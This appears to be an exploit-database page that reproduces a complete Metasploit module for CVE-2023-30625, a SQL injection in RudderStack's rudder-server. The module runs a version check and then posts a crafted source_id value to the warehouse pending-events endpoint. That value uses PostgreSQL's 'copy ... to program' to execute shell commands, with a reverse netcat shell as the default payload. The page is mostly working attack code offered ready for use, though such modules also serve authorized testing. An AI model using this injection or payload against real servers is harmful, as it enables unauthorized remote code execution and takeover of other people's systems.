Rudder Server SQL Injection / Remote Code Execution Exploit

2023-08-0100:00:00

Ege Balci

0day.today

137

metasploit

sql injection

remote code execution

rudder server

rudder-server

open source

cdp

vulnerability

postgresql

cve-2023-30625

github

nist

unix

linux

command

version

security advisory

bash

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

0.943 High

EPSS

Percentile

99.2%

JSON

This Metasploit module exploits a SQL injection vulnerability in RudderStack’s rudder-server, an open source Customer Data Platform (CDP). The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1. By exploiting this flaw, an attacker can execute arbitrary SQL commands, which may lead to remote code execution due to the rudder role in PostgreSQL having superuser permissions by default.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Rudder Server SQLI Remote Code Execution',
        'Description' => %q{
          This Metasploit module exploits a SQL injection vulnerability in
          RudderStack's rudder-server, an open source Customer Data Platform (CDP).
          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
          By exploiting this flaw, an attacker can execute arbitrary SQL commands,
          which may lead to Remote Code Execution (RCE) due to the `rudder` role
          in PostgreSQL having superuser permissions by default.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege Balcı <[email protected]>' # msf module
        ],
        'References' => [
          ['CVE', '2023-30625'],
          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],
        ],
        'DefaultOptions' => {
          'SSL' => false,
          'WfsDelay' => 5
        },
        'Platform' => [ 'unix', 'linux' ],
        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          # Due to the insufficient build instructions for Windows platforms, no testing were done on this platform.
          # As a result, the target is disabled in this exploit module.
          # [
          #   'Windows Command',
          #   {
          #     'Platform' => 'win',
          #     'Arch' => ARCH_CMD,
          #     'Type' => :win_cmd,
          #     'DefaultOptions' => {
          #       'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'
          #     }
          #   }
          # ],
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2023-06-16',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),
      ]
    )
  end

  def check
    version = get_version
    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'

    if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', ''))
      return Exploit::CheckCode::Appears("Rudder Version: #{version}")
    end

    Exploit::CheckCode::Safe
  end

  def get_version
    return @get_version if @get_version

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'version')
    )
    if res && res.code == 200
      @get_version = res.get_json_document['Version']
      if @get_version.empty?
        @get_version = 'Unknown'
      end

      @get_version
    end
  end

  def exploit
    print_status "Detected rudder version: #{get_version}"
    # If not 'Auto' then use the selected version
    case target['Type']
    # when :win_cmd
    #   shell = 'cmd.exe'
    when :unix_cmd
      shell = 'bash'
    else
      fail_with(Failure::BadConfig, 'Please select a valid target')
    end

    data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
    print_status 'Triggering RCE via crafted SQL query...'
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),
      'ctype' => 'application/json',
      'data' => data
    })
  end
end